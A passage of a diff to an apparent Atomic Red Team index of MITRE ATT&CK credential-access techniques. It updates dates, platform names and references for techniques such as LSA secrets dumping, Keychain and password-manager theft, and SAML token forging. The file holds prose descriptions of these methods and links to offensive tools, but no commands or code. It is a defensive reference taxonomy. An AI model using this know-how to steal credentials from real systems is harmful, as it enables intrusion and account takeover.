+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1056.001:
@@ -43375,12 +44037,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1110.001:
     technique:
-      modified: '2023-10-16T16:57:41.743Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Guessing'
       description: |-
         Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43409,6 +44070,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Mohamed Kmal
@@ -43420,18 +44082,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -43458,14 +44120,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.001
     atomic_tests: []
   T1003:
     technique:
-      modified: '2024-04-18T23:47:41.667Z'
+      modified: '2024-10-15T15:12:43.034Z'
       name: OS Credential Dumping
       description: |
         Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -43589,12 +44248,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003
     atomic_tests: []
   T1539:
     technique:
-      modified: '2024-04-16T12:56:56.861Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Web Session Cookie
       description: |-
         An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -43609,10 +44267,11 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Johann Rehberger
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for attempts to access files and repositories on
         a local system that are used to store browser session cookies. Monitor for
@@ -43620,14 +44279,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'File: File Access'
@@ -43670,14 +44329,11 @@ credential-access:
         url: https://blog.talosintelligence.com/roblox-scam-overview/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1539
     atomic_tests: []
   T1003.002:
     technique:
-      modified: '2023-07-24T18:53:10.860Z'
+      modified: '2024-10-15T16:40:52.174Z'
       name: 'OS Credential Dumping: Security Account Manager'
       description: "Adversaries may attempt to extract credential material from the
         Security Account Manager (SAM) database either through in-memory techniques
@@ -43732,14 +44388,13 @@ credential-access:
         url: https://github.com/Neohapsis/creddump7
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.002
     atomic_tests: []
   T1552.005:
     technique:
-      modified: '2023-03-21T13:56:27.910Z'
+      modified: '2024-10-15T16:24:20.219Z'
       name: 'Unsecured Credentials: Cloud Instance Metadata API'
       description: |
         Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -43790,14 +44445,13 @@ credential-access:
         url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.005
     atomic_tests: []
   T1555.002:
     technique:
-      modified: '2024-03-29T16:37:34.772Z'
+      modified: '2024-10-15T16:41:18.638Z'
       name: Securityd Memory
       description: |-
         An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -43831,8 +44485,8 @@ credential-access:
         external_id: T1555.002
       - source_name: External to DA, the OS X Way
         description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
       - source_name: Apple Dev SecurityD
         description: Apple. (n.d.). Security Server and Security Agent. Retrieved
           March 29, 2024.
@@ -43849,11 +44503,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.002:
     technique:
-      modified: '2023-03-30T21:01:48.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Cracking'
       description: "Adversaries may use password cracking to attempt to recover usable
         credentials, such as plaintext passwords, when credential material such as
@@ -43871,7 +44524,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Mohamed Kmal
       x_mitre_deprecated: false
@@ -43888,10 +44541,10 @@ credential-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Azure AD
       - Network
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -43915,46 +44568,12 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Password_cracking
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1110.002
     atomic_tests: []
   T1555.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
-      created: '2020-02-12T18:55:24.728Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.001
-        url: https://attack.mitre.org/techniques/T1555/001
-      - source_name: External to DA, the OS X Way
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-      - source_name: Keychain Services Apple
-        url: https://developer.apple.com/documentation/security/keychain_services
-        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
-      - source_name: Empire Keychain Decrypt
-        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
-        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
-          Retrieved April 14, 2022.
-      - source_name: OSX Keychain Schaumann
-        url: https://www.netmeister.org/blog/keychain-passwords.html
-        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
-          store and retrieve passwords. Retrieved March 31, 2022.
-      - source_name: Keychain Decryption Passware
-        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
-        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
-          Retrieved April 13, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:35:39.985Z'
+      name: 'Credentials from Password Stores: Keychain'
       description: "Adversaries may acquire credentials from Keychain. Keychain (or
         Keychain Services) is the macOS credential management system that stores account
         names, passwords, private keys, certificates, sensitive application data,
@@ -43975,65 +44594,62 @@ credential-access:
         file. Both methods require a password, where the default password for the
         Login Keychain is the current user’s password to login to the macOS host.(Citation:
         External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  "
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Credentials from Password Stores: Keychain'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Unlocking the keychain and using passwords from it is a very
         common process, so there is likely to be a lot of noise in any detection technique.
         Monitoring of system calls to the keychain can help determine if there is
         a suspicious process trying to access it.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Process: OS API Execution'
       - 'File: File Access'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+      created: '2020-02-12T18:55:24.728Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/001
+        external_id: T1555.001
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      - source_name: Keychain Services Apple
+        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+        url: https://developer.apple.com/documentation/security/keychain_services
+      - source_name: Empire Keychain Decrypt
+        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+          Retrieved April 14, 2022.
+        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+      - source_name: OSX Keychain Schaumann
+        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+          store and retrieve passwords. Retrieved March 31, 2022.
+        url: https://www.netmeister.org/blog/keychain-passwords.html
+      - source_name: Keychain Decryption Passware
+        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+          Retrieved April 13, 2022.
+        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.001
     atomic_tests: []
   T1003.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ed Williams, Trustwave, SpiderLabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
-      type: attack-pattern
-      created: '2020-02-21T16:22:09.493Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.004
-        url: https://attack.mitre.org/techniques/T1003/004
-      - source_name: Passcape LSA Secrets
-        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
-        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
-          2020.
-      - source_name: Microsoft AD Admin Tier Model
-        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
-        description: Microsoft. (2019, February 14). Active Directory administrative
-          tier model. Retrieved February 21, 2020.
-      - source_name: Tilbury Windows Credentials
-        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
-        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
-          Mitigation, Defense. Retrieved February 21, 2020.'
-      - source_name: ired Dumping LSA Secrets
-        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
-        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
-          Retrieved February 21, 2020.
-      - url: https://github.com/mattifestation/PowerSploit
-        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
-        source_name: Powersploit
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-13T15:49:17.591Z'
       name: 'OS Credential Dumping: LSA Secrets'
       description: |-
         Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -44042,6 +44658,9 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ed Williams, Trustwave, SpiderLabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor processes and command-line arguments for program
         execution that may be indicative of credential dumping. Remote access tools
         may contain built-in features or incorporate existing tools like Mimikatz.
@@ -44049,31 +44668,63 @@ credential-access:
         such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
         may require additional logging features to be configured in the operating
         system to collect necessary information for analysis.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+      created: '2020-02-21T16:22:09.493Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/004
+        external_id: T1003.004
+      - source_name: Tilbury Windows Credentials
+        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+          Mitigation, Defense. Retrieved February 21, 2020.'
+        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+      - source_name: ired Dumping LSA Secrets
+        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+          Retrieved February 21, 2020.
+        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+      - source_name: Microsoft AD Admin Tier Model
+        description: Microsoft. (2019, February 14). Active Directory administrative
+          tier model. Retrieved February 21, 2020.
+        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+      - source_name: Passcape LSA Secrets
+        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+          2020.
+        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+      - source_name: Powersploit
+        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+        url: https://github.com/mattifestation/PowerSploit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.004
     atomic_tests: []
   T1606.002:
     technique:
-      modified: '2024-03-01T17:55:56.116Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Forge Web Credentials: SAML token'
       description: |-
         An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
 
         An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
 
-        An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+        An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Blake Strom, Microsoft 365 Defender
       - Oleg Kolesnikov, Securonix
@@ -44086,14 +44737,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
       - SaaS
       - Windows
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -44134,14 +44785,11 @@ credential-access:
         url: https://www.sygnia.co/golden-saml-advisory
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1606.002
     atomic_tests: []
   T1003.007:
     technique:
-      modified: '2024-04-10T16:41:01.496Z'
+      modified: '2024-10-15T15:13:32.253Z'
       name: 'OS Credential Dumping: Proc Filesystem'
       description: |-
         Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -44204,81 +44852,79 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.007
     atomic_tests: []
   T1555.005:
     technique:
+      modified: '2024-08-19T13:53:33.661Z'
+      name: Password Managers
+      description: |-
+        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_contributors:
+      - Matt Burrough, @mattburrough, Microsoft
+      x_mitre_deprecated: false
+      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+        for suspicious activity that could indicate searching in process memory of
+        password managers. \n\nConsider monitoring file reads surrounding known password
+        manager applications."
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Matt Burrough, @mattburrough, Microsoft
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      - 'Process: OS API Execution'
+      - 'File: File Access'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
       created: '2021-01-22T16:08:40.629Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1555.005
         url: https://attack.mitre.org/techniques/T1555/005
-      - source_name: ise Password Manager February 2019
-        url: https://www.ise.io/casestudies/password-manager-hacking/
-        description: 'ise. (2019, February 19). Password Managers: Under the Hood
-          of Secrets Management. Retrieved January 22, 2021.'
+        external_id: T1555.005
+      - source_name: Cyberreason Anchor December 2019
+        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+          10, 2020.'
+        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
       - source_name: FoxIT Wocao December 2019
-        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
         description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
           Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
           October 8, 2020.'
+        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+      - source_name: ise Password Manager February 2019
+        description: 'ise. (2019, February 19). Password Managers: Under the Hood
+          of Secrets Management. Retrieved January 22, 2021.'
+        url: https://www.ise.io/casestudies/password-manager-hacking/
       - source_name: Github KeeThief
-        url: https://github.com/GhostPack/KeeThief
         description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
           2021.
+        url: https://github.com/GhostPack/KeeThief
       - source_name: NVD CVE-2019-3610
-        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
         description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
           Detail. Retrieved April 14, 2021.
-      - source_name: Cyberreason Anchor December 2019
-        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
-        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
-          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
-          10, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Password Managers
-      description: |-
-        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
-        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
-         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
-        for suspicious activity that could indicate searching in process memory of
-        password managers. \n\nConsider monitoring file reads surrounding known password
-        manager applications."
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      - 'Process: OS API Execution'
-      - 'File: File Access'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -44363,12 +45009,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1552.002:
     technique:
-      modified: '2023-07-28T18:29:56.525Z'
+      modified: '2024-10-15T16:26:46.873Z'
       name: 'Unsecured Credentials: Credentials in Registry'
       description: |-
